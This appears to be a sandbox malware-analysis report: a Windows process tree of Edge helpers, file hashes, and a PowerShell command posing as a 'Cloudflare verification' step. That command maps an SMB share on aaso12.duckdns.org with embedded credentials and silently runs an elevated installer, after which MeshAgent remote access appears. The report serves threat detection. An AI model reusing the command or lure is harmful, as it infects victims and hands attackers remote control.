C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5372,i,13228339605882536641,7409267909747752373,262144 --variations-seed-version --mojo-platform-channel-handle=5488 /prefetch:82⤵PID:1840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5812,i,13228339605882536641,7409267909747752373,262144 --variations-seed-version --mojo-platform-channel-handle=5832 /prefetch:82⤵PID:2528
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5812,i,13228339605882536641,7409267909747752373,262144 --variations-seed-version --mojo-platform-channel-handle=5832 /prefetch:82⤵PID:5424
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5528,i,13228339605882536641,7409267909747752373,262144 --variations-seed-version --mojo-platform-channel-handle=5624 /prefetch:82⤵PID:1044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5728,i,13228339605882536641,7409267909747752373,262144 --variations-seed-version --mojo-platform-channel-handle=6160 /prefetch:82⤵PID:5732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6128,i,13228339605882536641,7409267909747752373,262144 --variations-seed-version --mojo-platform-channel-handle=6140 /prefetch:82⤵PID:4128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=704,i,13228339605882536641,7409267909747752373,262144 --variations-seed-version --mojo-platform-channel-handle=6148 /prefetch:82⤵PID:4344
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6248,i,13228339605882536641,7409267909747752373,262144 --variations-seed-version --mojo-platform-channel-handle=6244 /prefetch:82⤵PID:2332
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6040,i,13228339605882536641,7409267909747752373,262144 --variations-seed-version --mojo-platform-channel-handle=6288 /prefetch:82⤵PID:1548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:4564
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start1⤵PID:3908
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start2⤵PID:1548
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -Command "Start-Process cmd -ArgumentList '/c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall' -windowstyle hidden -Verb RunAs; # Cloudflare verification (Ray ID: 90b0e54eb8bdaasd84)1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5352 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall2⤵PID:3460
-
C:\Windows\system32\net.exenet use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234!3⤵PID:5600
-
-
\??\UNC\aaso12.duckdns.org\shear\s.exe\\aaso12.duckdns.org\shear\s -fullinstall3⤵
- Sets service image path in registry
- Drops file in System32 directory
- Drops file in Program Files directory
PID:384
-
-
-
C:\Program Files\Mesh Agent\MeshAgent.exe"C:\Program Files\Mesh Agent\MeshAgent.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:5836 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noprofile -nologo -command -2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6084
-
Network
MITRE ATT&CK Enterprise v16
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.3MB
MD5e2264eb1b5f614db39e8dadde0c4c487
SHA16cd4fbf6499071686fc8c448307f17d141199ea1
SHA2563f38dab1278850190a70c91a9671fdada649bbd6f8abafba9970c7f43c59565d
SHA512cc1347041f87d823f304afad43d225a6c48bc2016d724a1b2ac5ec3e52fbd7adf846f5bdee6f6dde8de6fe0c29c0bd0d4502edb0a30a59b9ac709703415b7923
-
Filesize
280B
MD501cc3a42395638ce669dd0d7aba1f929
SHA189aa0871fa8e25b55823dd0db9a028ef46dfbdd8
SHA256d0c6ee43e769188d8a32f782b44cb00052099222be21cbe8bf119469c6612dee
SHA512d3b88e797333416a4bc6c7f7e224ba68362706747e191a1cd8846a080329473b8f1bfebee5e3fe21faa4d24c8a7683041705e995777714330316e9b563d38e41
-
Filesize
2B
MD599914b932bd37a50b983c5e7c90ae93b
SHA1bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA25644136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA51227c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd
-
Filesize
107KB
MD52b66d93c82a06797cdfd9df96a09e74a
SHA15f7eb526ee8a0c519b5d86c845fea8afd15b0c28
SHA256d4c064db769b3c109da2ed80a53fbab00987c17421a47921e41e213781d67954
SHA51295e45c0aea0e704be5f512dffaae377d4abef78da99b3bca769264d69be20f2570daf2f47905645217e1b2696e42b101f26149219f148b4d6dd97a6c2868b6f5
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
40B
MD520d4b8fa017a12a108c87f540836e250
SHA11ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA2566028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856
-
Filesize
16KB
MD584673b27f29b9b405937de306f8d5fae
SHA1703fb4f74bce2fa0d6034f370afe959d0afaed69
SHA256272c8299983facd81cf61e7888b93c2f7908f4c75de1237918dde6b15cbbe0b4
SHA5123383c65e1c0e9496d2f4fa5c2a73f3af9d20ae8e0e8b20c18447b83f559dd53332499af17c3261c9d0277621dc5cce2ff4722562119c6f3d3df6fb5ddcf56d71
-
Filesize
36KB
MD54b69e670bfbae0311a383e3b09ac84fc
SHA1004df14bc470b739f9c7d0b67fc76fc1df3c381b
SHA2563deb367cfc2af784d1bea8725685d23802a93ee5918447d9bdb33e42c61ecb83
SHA512df2576bcf9ac545e20ea2cf614a3f39acc2589dbb62d0a23f933898f1bf3b9dcc5f42d997d34f4a08352cc0494da1643625188dbf90e8a19c72be906f6934fe9
-
Filesize
22KB
MD57a8cf1d8988e9ae9f89ca0cf7368640a
SHA16f50d4436cdbe0bb397e6d43c7f6698acd71b8ac
SHA2561446763674f831a12251a6c5d2ad63e98e1c8636c7ef2953dfe49c8c9b8dfa22
SHA5120ccebe530a0d95577a7b0aa0564a582ba8e67944bff223a685b7226b719475d5195e25994eb42d4d8611fb11e83de871a4047f40bb8dd0bf508c924521110811
-
Filesize
40KB
MD5357991d7f9916eb2a1f3a942f485ec80
SHA15935be9eb03ec2787c8292ce74277c08fc9010f6
SHA256eec47cd09a34d353b176043024849d1bce69e1fdd60975fc76e4fb58195e2da2
SHA51229c24fde36875bcde9364057868ee5307e815c566234177dfb658de7d153bb56c635c714eaa07abf52928415c41a4f0433f557e741f178d69f44e43457448b04
-
Filesize
49KB
MD55a3b89edc852f0133a47134a86a45fb3
SHA1587d0767767c101cb785762e90ff0ae793f544d3
SHA2560b85d97ab2ed2ccf53b763d8fb63c46e07063a7e688373e5b7b369d2859be247
SHA512e3cfd5080e560446adb01e3f5783ab4ca2c9931c63e20181c5b8aece27dfc49c3d09ba5ee4abf653a50d6b8801b5c0d904f92931d189b9090ffb859d838a7cf0
-
Filesize
41KB
MD531b17d41a06f330d2c2edba2b18317b7
SHA152a12bdf8e1566c0949521d417c798b4ef4c90b2
SHA25634b80aaca680b9ee15223812aa83db7fd69dd1ce6845a6e675b819780ff333f5
SHA5125d4ecb2ad2d8fe33366d1d85fdc0fe009c055ad52269725a3808d934b5494e7591cf62e11dc27e4605d68593dc374c640d8f66bfd0341fcdc18f60057c929538
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\extensions_crx_cache\ghbmnnjooekpmoecnnnilnnbdlolhkhi_1.fa2232917a5656ea4f811936561ea6b7c92b3c0004c5e08ecb97636d3afc6f72
Filesize152KB
MD5dd9bf8448d3ddcfd067967f01e8bf6d7
SHA1d7829475b2bd6a3baa8fabfaf39af57c6439b35e
SHA256fa2232917a5656ea4f811936561ea6b7c92b3c0004c5e08ecb97636d3afc6f72
SHA51265347df34378c2bbb34417e2cccfb3251a0b2412422cc190eed9df525b6e0a9948e0295ea3c33b3ad873ce81e369e89a138ac41d6eb7229546c3269107e661de
-
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
Filesize2KB
MD522fde5566bf1ffa5c137e63bd66d7765
SHA1d3a9a7f07c211a08875f1e3a288661fa7e6fe245
SHA2567ed40f1b94ab3eb0633617e13e27c7133680c60e3fc6dc27364779a36dbe69e2
SHA51230280847c39a27846b8092edd9c104998883ab5b10b27c046f4468db5998632243fe0da047e24a069d9a2894fa398c9f9b32003367c6a4cb95ae5c134914b3fb
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\5CB41B28531003B1CA711172FA90258DA5879AA4
Filesize1KB
MD54a7c389d057f602875db54f55bcb5938
SHA1ffbd9b544696344fa017abea645c82898cd4f2b4
SHA256ef305cf93cc62953e117fe80dd09e9ce657e6e7dcd46138d7885117189efbc7e
SHA512e544ac176f00a4eed554670a815eea53504e244639121f588e37ec8448fb83ee17dde3c436065818cf31a10d7709869076048468f06e3292e7d4d06fa86fd72f